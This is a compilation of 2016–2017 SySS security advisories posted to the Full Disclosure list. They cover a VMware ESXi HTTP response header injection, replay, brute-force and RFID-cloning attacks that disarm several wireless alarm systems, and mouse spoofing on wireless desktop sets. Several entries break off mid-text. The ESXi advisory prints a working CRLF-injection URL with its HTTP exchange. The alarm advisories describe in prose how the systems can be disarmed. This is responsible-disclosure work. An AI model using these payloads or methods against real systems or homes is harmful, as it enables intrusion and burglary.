[FD] [SYSS-2016-063] VMware ESXi 6 - Improper Input Validation (CWE-20)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-063 Product: VMware vSphere Hypervisor (ESXi) Manufacturer: VMware, Inc. Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1) VMware vCenter Server 6.0 U2 Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1) Vulnerability Type: Improper Input Validation (CWE-20) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2016-07-01 Solution Date: 2016-08-04 Public Disclosure: 2016-08-05 CVE Reference: CVE-2016-5331 Authors of Advisory: Matthias Deeg (SySS GmbH) Overview: VMware vSphere Hypervisor is a type-1 hypervisor for serving virtual machines. The manufacturer describes the product as follows (see [1]): "Virtualize even the most resource-intensive applications with peace of mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor architecture that sets the industry standard for reliability and performance." Due to improper input validation, the web server of VMware ESXi 6 is prone to HTTP response injection attacks. Vulnerability Details: The SySS GmbH found out that the web server of VMware ESXi 6 is vulnerable to HTTP response injection attacks, as arbitrarily supplied URL parameters are copied in the HTTP header Location of the server response without sufficient input validation. Thus, an attacker can create a specially crafted URL with a specific URL parameter that injects attacker-controlled data to the response of the VMware ESXi web server. Depending on the context, this allows different attacks. If such a URL is visited by a victim, it may for example be possible to set web browser cookies in the victim's web browser, execute arbitrary JavaScript code, or poison caches of proxy servers. Proof of Concept (PoC): The following URL is a simple attack vector to illustrate the HTTP response header injection vulnerability by setting an attacker-controlled session cookie named "test" with the value "31337" within the victim's web browser: https:///?syss%0d%0aset-cookie:test=31337%0d%0at=1 The corresponding HTTP GET request and the VMware ESXi web server response are as follows: GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close HTTP/1.1 303 See Other Date: Thu, 30 Jun 2016 15:12:23 GMT Connection: close Location: /?syss set-cookie:test=31337 t=1/ X-Frame-Options: DENY Content-Length: 0 Solution: The manufacturer VMware has fixed the reported security vulnerability and disclosed detailed information about the issue and a software update for affected products in its security advisory VMSA-2016-0010 [4]. Disclosure Timeline: 2016-07-01: Vulnerability reported to manufacturer 2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory 2016-07-14: Manufacturer further investigates the reported security issue 2016-07-22: Manufacturer announces disclosure of this security issue 2016-08-04: Public release of VMware security advisory VMSA-2016-0010 and security update 2016-08-05: Public release of SySS security advisory References: [1] Product website for VMware vSphere Hypervisor (ESXi) https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0 [2] SySS Security Advisory SYSS-2016-063 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [4] VMware Security Advisory VMSA-2016-0010 http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html Credits: This security vulnerability was independently found and reported by Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of A2secure and Ammarit Thongthua (see [4]). E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information prov
[FD] [SYSS-2016-117] ABUS Secvest (FUAA50000) - Missing Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-117 Product: ABUS Secvest (FUAA5) Manufacturer: ABUS Affected Version(s): v1.01.00 Tested Version(s): v1.01.00 Vulnerability Type: Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-11-28 Solution Date: - Public Disclosure: 2017-02-20 CVE Reference: Not yet assigned Author of Advisory: Matthias Deeg (SySS GmbH) Overview: ABUS Secvest (FUAA5) is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " * Convenient operation via the app (Android/iOS), integrated web browser and also at the alarm panel * For up to 50 users with freely selectable control options (code/chip key/remote control) * Active intrusion protection in combination with additional mechatronic wireless window/door locks * Video verification of alarms via email, push notifications or via the app * Up to 48 individually identifiable wireless detectors, eight control panels, 50 remote controls * Integrated dialling device * VdS Home certified and EN 50131-1 Level 2 * Alarm verification via the integration of up to six IP cameras * 32 additional wireless outputs for flexible event control * Switching to monitoring station via protocols possible " Due to an insecure implementation of the used 868 MHz radio communication, the wireless alarm system ABUS Secvest is vulnerable to replay attacks. Vulnerability Details: SySS GmbH found out that the radio communication protocol used by the ABUS Secvest wireless alarm system (FUAA5) and its remote control (FUBE50013) is not protected against replay attacks. Therefore, an attacker can record the radio signal of a wireless remote control, for example using a software-defined radio, when the alarm system is disarmed by its owner, and play it back at a later time in order to disable the alarm system at will. Proof of Concept (PoC): SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio and disarm an ABUS Secvest wireless alarm system in an unauthorized way. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-11-28: Vulnerability reported to manufacturer 2016-12-05: Vulnerability reported to manufacturer again 2016-12-06: Manufacturer responded to emails 2016-12-08: Exchanged further information with manufacturer 2017-02-07: Asked manufacturer for current status concerning the reported security issue 2017-02-20: Public release of security advisory References: [1] Product website for ABUS Secvest wireless alarm system https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] SySS Security Advisory SYSS-2016-117 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [4] Plusminus video: Von wegen sicher - Wie leicht Alarmanlagen zu knacken sind http://www.daserste.de/information/wirtschaft-boerse/plusminus/videos/von-wegen-sicher-wie-leicht-alarmanlagen-zu-knacken-sind-100.html Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAliqyqgACgkQ2aS/ajSt TauDyBAAooHv0j6CNMghjO72OmILNbjUhXovwiPj4XqpQjKxb7NOxDpSzEfrKZPy B2m2Ki6dUW52a0wBEoWec4ONAH+c1eDFBehFlhryGkSq
[FD] [SYSS-2016-058] CHERRY B.UNLIMITED AES - Insufficient Verification of Data Authenticity (CWE-345)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-058 Product: CHERRY B.UNLIMITED AES Manufacturer: Cherry GmbH Affected Version(s): JD-0400EU-2/01 Tested Version(s): JD-0400EU-2/01 Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Mouse Spoofing Attack Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-06-28 Solution Date: - Public Disclosure: 2016-09-30 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: CHERRY B.UNLIMITED AES is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "CHERRY B. UNLIMITED AES combines secure data transmission and an advanced energy supply in a design which has been thought through to the very last detail. For high professional requirements and security both at home and in the workplace." Some of the key benefits of CHERRY B.UNLIMITED AES are (see [2]): * Data transmission using 128-bit encryption, complying to Advanced Encryption Standard (AES) * USB cable charging function for both keyboard & mouse - even when in use * High-quality, pre-charged NiMH batteries from GP with a very low self-discharge * Almost interference-free wireless 2.4 GHz technology (range of up to 10 metres) * 3-button mouse: infrared sensor and adjustable resolution (1,000/2,000 dpi) with ergonomic side panels * Multi-station capability operation of several wireless products in one room * Easy to install, requiring no technical knowledge * Mini USB receiver * Keyboard awarded the "Blauer Engel" environmental seal Due to unencrypted and unauthenticated mouse data communication, the wireless desktop set CHERRY B.UNLIMITED AES is prone to mouse spoofing attacks. Vulnerability Details: The SySS GmbH found out that the mouse of the wireless desktop set CHERRY B.UNLIMITED AES is prone to spoofing attacks, as the mouse data communication is unencrypted and unauthenticated. An attacker can analyze the unencrypted mouse data packets of the 2.4 GHz radio communication sent by the mouse to the receiver (USB dongle) in order to learn the used protocol. By knowing the used mouse data protocol, it is possible to spoof mouse actions like mouse movements or mouse clicks by sending forged data packets. Thus, an attacker is able to remotely control the mouse pointer of a target system that is operated with the wireless desktop set CHERRY B.UNLIMITED AES. If the graphical user interface of the victim's system is unlocked, an attacker can for example send a list of mouse actions that start the virtual on-screen keyboard of the operating system and execute arbitrary commands in the context of the currently logged in user, for instance a download and execute attack vector. As the attacker may not have an unobstructed view to the target system's screen and may not know the used operating system, the screen resolution, or the current mouse settings, this kind mouse spoofing attack is based on heuristics. But concerning an unlocked and unattended system, an attacker can simply try different attack vectors for different target system configurations sequentially. Proof of Concept (PoC): The SySS GmbH could successfully perform mouse spoofing attacks against a target system operated with the wireless desktop set CHERRY B.UNLIMITED AES using an in-house developed software tool in combination with the USB radio dongle Crazyradio PA (see [3]). A proof-of-concept mouse spoofing attack resulting in remote code execution using the SySS software tool Radioactive Mouse is demonstrated in a video (see [4]). Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-06-28: Vulnerability reported to manufacturer 2016-09-30: Public release of the security advisory References: [1] Data sheet for CHERRY B.UNLIMITED AES http://cherry.de/PDF/EN_CHERRY_B_UNLIMITED_AES.pdf [2] Product website for CHERRY B.UNLIMITED AES http://cherry.de/cid/wireless_keyboards_CHERRY_B_UNLIMITED_AES.htm?rdeLocaleAttr=en_id= [3] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [4] SySS Proof-of-Concept Mouse Spoofing Attack Video https://www.youtube.com/watch?v=PkR8EODee44 [5] SySS Security Advisory SYSS-2016-058 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-058.txt [6] SyS
[FD] [SYSS-2016-060] Logitech M520 - Insufficient Verification of Data Authenticity (CWE-345)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-060 Product: M520 (Mouse of Wireless Combo MK520) Manufacturer: Logitech Affected Version(s): Model Y-R0012 Tested Version(s): Model Y-R0012 Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Mouse Spoofing Attack Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-06-28 Solution Date: - Public Disclosure: 2016-09-30 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Logitech Wireless Combo MK520 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "A keyboard and mouse that puts convenience and control comfortably at your fingertips" Due to unencrypted and unauthenticated mouse data communication, the wireless desktop set Logitech Wireless Combo MK520 is prone to mouse spoofing attacks. Vulnerability Details: The SySS GmbH found out that the mouse of the wireless desktop set Logitech Wireless Combo MK520 is prone to spoofing attacks, as the mouse data communication is unencrypted and unauthenticated. An attacker can analyze the unencrypted mouse data packets of the 2.4 GHz radio communication sent by the mouse to the receiver (USB dongle) in order to learn the used protocol. By knowing the used mouse data protocol, it is possible to spoof mouse actions like mouse movements or mouse clicks by sending forged data packets. Thus, an attacker is able to remotely control the mouse pointer of a target system that is operated with the wireless desktop set Logitech Wireless Combo MK520. If the graphical user interface of the victim's system is unlocked, an attacker can for example send a list of mouse actions that start the virtual on-screen keyboard of the operating system and execute arbitrary commands in the context of the currently logged in user, for instance a download and execute attack vector. As the attacker may not have an unobstructed view to the target system's screen and may not know the used operating system, the screen resolution, or the current mouse settings, this kind mouse spoofing attack is based on heuristics. But concerning an unlocked and unattended system, an attacker can simply try different attack vectors for different target system configurations sequentially. Proof of Concept (PoC): The SySS GmbH could successfully perform mouse spoofing attacks against a target system operated with the wireless desktop set Logitech Wireless Combo MK520 using an in-house developed software tool in combination with the USB radio dongle Crazyradio PA (see [2]). A proof-of-concept mouse spoofing attack resulting in remote code execution using the SySS software tool Radioactive Mouse is demonstrated in a video (see [4]). Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-06-28: Vulnerability reported to manufacturer 2016-09-30: Public release of the security advisory References: [1] Product website for Logitech Wireless Combo MK520 http://www.logitech.com/en-us/product/wireless-combo-mk520 [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] SySS Security Advisory SYSS-2016-060 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-060.txt [4] SySS Proof-of-Concept Mouse Spoofing Attack Video https://www.youtube.com/watch?v=PkR8EODee44 [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg and Gerhard Klostermeier of the SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as
[FD] Radioactive Mouse States the Obvious: Exploiting unencrypted and unauthenticated data communication of wireless mice
tl;dr Today, SySS published a proof-of-concept video demonstrating a mouse spoofing attack resulting in remote code execution due to insecure wireless mouse communication: https://www.youtube.com/watch?v=PkR8EODee44 - Radioactive Mouse States the Obvious In the course of their research project about modern wireless desktop sets using AES encryption, Expert IT Security consultant Matthias Deeg and IT Security Consultant Gerhard Klostermeier noticed that the radio communication of all tested wireless mice so far was unencrypted and unauthenticated. The insight that radio communication of many wireless mice is insecure and can be exploited in specific attack scenarios is not new. The fact that this well-known security issue still exists in current wireless mice which are part of modern wireless desktop sets using AES encryption for keyboard data, however, brought SySS to raise the awareness for this security vulnerability and the associated security risks once again. By knowing the used mouse data protocol, an attacker can spoof mouse actions like mouse movements or mouse clicks. Thus, an attacker can remotely control the mouse pointer of a target system in an unauthorized way. Using trial & error and good educated guesses (heuristic method), mouse spoofing attacks can result in remote code execution on affected target systems. Matthias Deeg and Gerhard Klostermeier developed a proof-of-concept software tool named Radioactive Mouse for conducting automated mouse spoofing attacks. A proof-of-concept mouse spoofing attack resulting in remote code execution is demonstrated in the following video: https://www.youtube.com/watch?v=PkR8EODee44 Further information about vulnerabilities in affected wireless mice of different manufacturers like Cherry, Microsoft, Logitech, and Perixx are described in the following four security advisories: SYSS-2016-058: CHERRY B.UNLIMITED AES - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-058.txt SYSS-2016-059: Microsoft Wireless Desktop 2000 - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-059.txt SYSS-2016-060: M520 (Mouse of Wireless Combo MK520) - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-060.txt SYSS-2016-061: PERIDUO-710W - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-061.txt Moreover, Matthias Deeg and Gerhard Klostermeier will present the results of their research project about modern wireless desktop sets at the following IT security conferences this autumn: Hack.lu, October 18-20, 2016, Luxembourg Hacktivity, October 21-22, 2016, Budapest Ruxcon, October 22-23, 2016, Melbourne DeepSec, November 10-11, 2016, Vienna ZeroNights, November 17-18, 2016, Moscow Currently, SySS recommends not using wireless mice without encryption and authentication in security-sensitive environments. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SYSS-2016-064] Multi Kon Trade M2B GSM Wireless Alarm System - Improper Restriction of Excessive Authentication Attempts (CWE-307)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-064 Product: M2B GSM Wireless Alarm System Manufacturer: Multi Kon Trade Affected Version(s): Unspecified Tested Version(s): Unspecified Vulnerability Type: Improper Restriction of Excessive Authentication Attempts (CWE-307) Risk Level: High Solution Status: Open Manufacturer Notification: 2016-07-05 Solution Date: - Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Gerhard Klostermeier, SySS GmbH Overview: The M2B GSM wireless alarm system by Multi Kon Trade (MKT) was tested for possible security issues. Some features of this alam system as described by the manufacturer are (see [1]): * You will be noticed of any alarm by call or by SMS message. * The alarm system has a battery which will last 6 to 8 hours in case of a blackout. * You can pair up to 99 devices (sensors, remote control, etc.). * You do not have to run any cables. Everything is wireless. * It is possible to trigger alarms in case of fire, even if the alarm is disabled. * It is possible to trigger the alarm with a delay. Due to an insecure implementation of the used 433 MHz radio communication, the wireless alarm system M2B GSM is vulnerable to brute-force attacks. Vulnerability Details: SySS GmbH found out that the 433 MHz radio communication of the wireless alarm system M2B GSM has no protection against brute-force attacks. A valid (paired) remote control is identified through its eight characters long identifier. A character is either "0", "1" or "f" (floating) (see [2]). Thus, it is possible to send any command signal for all possible identifiers. Via such a brute-force attack, for instance, it is possible to disarm an armed M2B GSM wireless alarm system remotely in an unauthorized manner. Proof of Concept (PoC): SySS GmbH build a small device that is able to arm and disarm every M2B GSM wireless alarm system within its radio range in max. 40 minutes. Solution: An extra anti-jammer device is purchasable by the Vendor. This sensor should detect malicious devices that are trying to disarm system using the brute-force method. If such a device is detected the alarm will be triggered. (Solution as suggested by the vendor.) Disclosure Timeline: 2016-07-05: Vulnerability reported to manufacturer 2016-10-13: Response from the vendor with the solution on how to mitigate the risk 2016-11-23: Public release of security advisory References: [1] M2B GSM Wireless Alarm System, Multi Kon Trade http://multikontrade.de/GSM-Funk-Alarmanlage [2] PT2260 Remote Control Encoder, Princeton Technology Corp. http://www.princeton.com.tw/Portals/0/Product/PT2260_4.pdf [3] SySS Security Advisory SYSS-2016-064 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-064.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Gerhard Klostermeier of SySS GmbH. E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNCglAAoJENmkv2o0rU2rgBYQAJB8N3DfO1TbmMszMRv7XBOS TIENtQ2lVEGiKV6TMReHu/7GjFYa/KNvE6129fBs6CC/LokySV6OttU7vLbpxXf4 z1Kcur/W7ztd6eRm0YCsBby908tEB0t/vW0pzDd58b76AAJkyxHW4/uGYSlXaJdl IkUUU1kYkuKuiLsqtjNTsEYCxDB9ZGslngFdZsGCZbXSwYiZOCNIuHWi+rb+Auu2 ypNf6/JdDV7G2iKTZy8oOQBk2oOsiF09CeuNJ5DNS5Mr+NJupFK4PsxoHYWqZnaq 95tMcuXAJacPHb+tBmzEeiE303pCFuCOwRxPAUDG+iwlBfbY1+s5RqvbYyP1PFRI xMbCSFwUoG5Kyko6JHV/lDAleKP2Dt4IgFu9VN6Tg2BARF6wtAaVa74RfjSm9YjA g1HUfm2hz+qKM6pbSdVx4JeKDMi6/8tk3KzFb+APNqhEvgNQa3GGiJEH6KpqGhzN bwUrqlqHPuGX+07CG42Y3klWXJXEqfW0p7LEMq2FDP514JLk2JxmBwrnHrW7nkQb
[FD] [SYSS-2016-072] Olypmia Protect 9061 - Missing Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-072 Product: Protect 9061 Manufacturer: Olympia Affected Version(s): Article No. 5943 rev.03 Tested Version(s): Article No. 5943 rev.03 Vulnerability Type: Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2016-07-21 Solution Date: 2016-11-14 Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Matthias Deeg (SySS GmbH) Overview: The Olympia Protect 9061 is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " Wireless alarm system with emergency call and handsfree function Integrated GSM (Dual Band) phone dialling with message function Handsfree/Room monitoring functions on the base unit Up to 10 phone numbers can be programmed Accoustic alarm via built-in sirene Programme the forwarding of alarms to external telephones (e.g. mobile phones) Alarm per Telephone with message function Individual message for each sensor, max. 10 seconds long Power failure backup in the base unit Can be upgraded to support up to max. 32 sensors Easy integration of the optional sensors via Plug & Play method " Due to an insecure implementation of the used 868 MHz radio communication, the wireless alarm system Olympia Protect 9061 is vulnerable to replay attacks. Vulnerability Details: SySS GmbH found out that the radio communication protocol used by the Olympia Protect 9061 wireless alarm system and its remote control is not protected against replay attacks. Therefore, an attacker can record the radio signal of a wireless remote control, for example using a software-defined radio, when the alarm system is disarmed by its owner, and play it back at a later time in order to disable the alarm system at will. Proof of Concept (PoC): SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio and disarm a Olympia Protect 9061 wireless alarm system in an unauthorized way. Solution: The reported security issue was fixed by the manufacturer in a new product version. Further information can be found via the following URL [2]: http://www.olympia-vertrieb.de/de/support/faq/sicherheitsprodukte.html Disclosure Timeline: 2016-07-21: Vulnerability reported to manufacturer 2016-08-25: Rescheduled publication date of the security advisory in agreement with the manufacturer 2016-09-13: According to the manufacturer, a fix to the reported security issue is available. 2016-10-06: The manufacturer presents the solution to the reported security issue to SySS GmbH 2016-11-14: Manufacturer provides further information concerning the security fix 2016-11-23: Public release of security advisory References: [1] Product website for Olympia Protect 9061 wireless alarm system http://www.olympia-vertrieb.de/en/products/security/wireless-alarm-systems/protect-9061.html [2] Information by the manufacturer concerning the security fix http://www.olympia-vertrieb.de/de/support/faq/sicherheitsprodukte.html [3] SySS Security Advisory SYSS-2016-072 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-072.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNChfAAoJENmkv2o0rU2rT84QAKdU+IVv35uihXP5SnileQCe ygI9vsfUBK8xrbvRN4uuBaR2Lf70dHxIZkXuGuxhh3DAn3OrM6uE4K1xQW13DMPR toKAyMXfDWA0Q2+wz0Fz/f86VMGArWoxRTe0Wl7rxh
[FD] [SYSS-2016-107] EASY HOME Alarmanlagen-Set - Cryptographic Issues (CWE-310)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-107 Product: EASY HOME Alarmanlagen-Set Manufacturer: monolith GmbH Affected Version(s): Model No. MAS-S01-09 Tested Version(s): Model No. MAS-S01-09 Vulnerability Type: Cryptographic Issues (CWE-310) Risk Level: Low Solution Status: Open Manufacturer Notification: 2016-10-05 Solution Date: - Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Gerhard Klostermeier (SySS GmbH) Overview: The EASY HOME MAS-S01-09 is a wireless alarm system with different features sold by ALDI SÜD. Some of the features as described in the German product manual are (see [1]): " - - Alarmanlagen-Set mit drahtlosen Sensoren und Mobilfunk-Anbindung - - SOS-Modus, Stiller Alarm, Überwachungs- und Intercom-Funktion - - Integrierte Quad-Band Mobilfunkeinheit für GSM-Netze im 850 / 900 / 1800 / 1900 MHz-Bereich - - Alarmbenachrichtigung auf externe Telefone - - Eingebaute Sirene (ca. 90 dB), inkl. Anschluss für externe Sirene - - Unterstützung für bis zu 98 kabellosen Sensoren / bis zu 4 kabelgebundene Sensoren - - Stromausfallsicherung der Basiseinheit durch 4 x AAA Alkaline-Batterien - - Fernbedienbar per Telefon " Due to the use of an insecure 125 kHz RFID technology, RFID tokens of the EASY HOME MAS-S01-09 wireless alarm system can easily be cloned and used to deactivate the alarm system in an unauthorized way. Vulnerability Details: SySS GmbH found out that the 125 kHz RFID technology used by the EASY HOME MAS-S01-09 wireless alarm system has no protection by means of authentication against rogue/cloned RFID tokens. The information stored on the used RFID tokens can be read easily in a very short time from distances up to 1 meter, depending on the used RFID reader. A working cloned RFID token is ready for use within a couple of seconds using freely available tools. Thus, an attacker with one-time access to the information of an RFID token of an EASY HOME MAS-S01-09 wireless alarm system is able to create a rogue RFID token that can be used to deactivate the alarm system in an unauthorized manner. Proof of Concept (PoC): SySS GmbH could successfully clone an RFID token of an EASY HOME MAS-S01-09 wireless alarm system using a freely available off-the-shelf tool and disarm the wireless alarm system in an unauthorized way. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability concerning the tested product version. For further information please contact the manufacturer. Disclosure Timeline: 2016-10-05: Vulnerability reported to manufacturer 2016-10-12: E-mail to manufcaturer concerning the status of the reported security issue 2016-11-23: Public release of security advisory References: [1] Product manual of EASY HOME MAS-S01-09 wireless alarm system http://monolith-shop.de/wp-content/uploads/2016/09/MAS-S01-09_Alarmanlage_Bedienungsanleitung.pdf [2] SySS Security Advisory SYSS-2016-107 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-107.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Gerhard Klostermeier of SySS GmbH. E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNChyAAoJENmkv2o0rU2r4MwQAKTTTRhqNyMi34MxOxUBDAQu ro3KnFe9C20jiDgnXhLNpwEjsDhqiI4VizScDPQ9EvLE5j5qA0M4SaPn3AZtIiDh XzKQFJ9Zqoe9COetmx8bEEtCTE1zz5WNy+MNNNqBPGKoIaM54Bcfp9u2W1fQhYW6 m0oTM/y3PPBG7R1xX5el5XPvrqu1Ic2Wr3aT7/MCSApk2cWQic4btERsnhFv4m1N 8bP0Ez9gNsgMRMzxV0vAS1f7AXJLh2tXxdFARhf5S6hnyMxiRpwDeStr6sOUWOTm iMWIGvptD/kFyJXsg8wLM7h4pqA/Ie9IXe3qETzH83bAEALggb3nT0vFRcPiMeOG
[FD] [SYSS-2016-066] Multi Kon Trade M2B GSM Wireless Alarm System - Missing Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-066 Product: M2B GSM Wireless Alarm System Manufacturer: Multi Kon Trade Affected Version(s): Unspecified Tested Version(s): Unspecified Vulnerability Type: Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-07-05 Solution Date: - Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Gerhard Klostermeier, SySS GmbH Overview: The M2B GSM wireless alarm system by Multi Kon Trade (MKT) was tested for possible security issues. Some features of this alarm system as described by the manufacturer are (see [1]): * You will be noticed of any alarm by call or by SMS message. * The alarm system has a battery which will last 6 to 8 hours in case of a blackout. * You can pair up to 99 devices (sensors, remote control, etc.). * You do not have to run any cables. Everything is wireless. * It is possible to trigger alarms in case of fire, even if the alarm is disabled. * It is possible to trigger the alarm with a delay. Due to an insecure implementation of 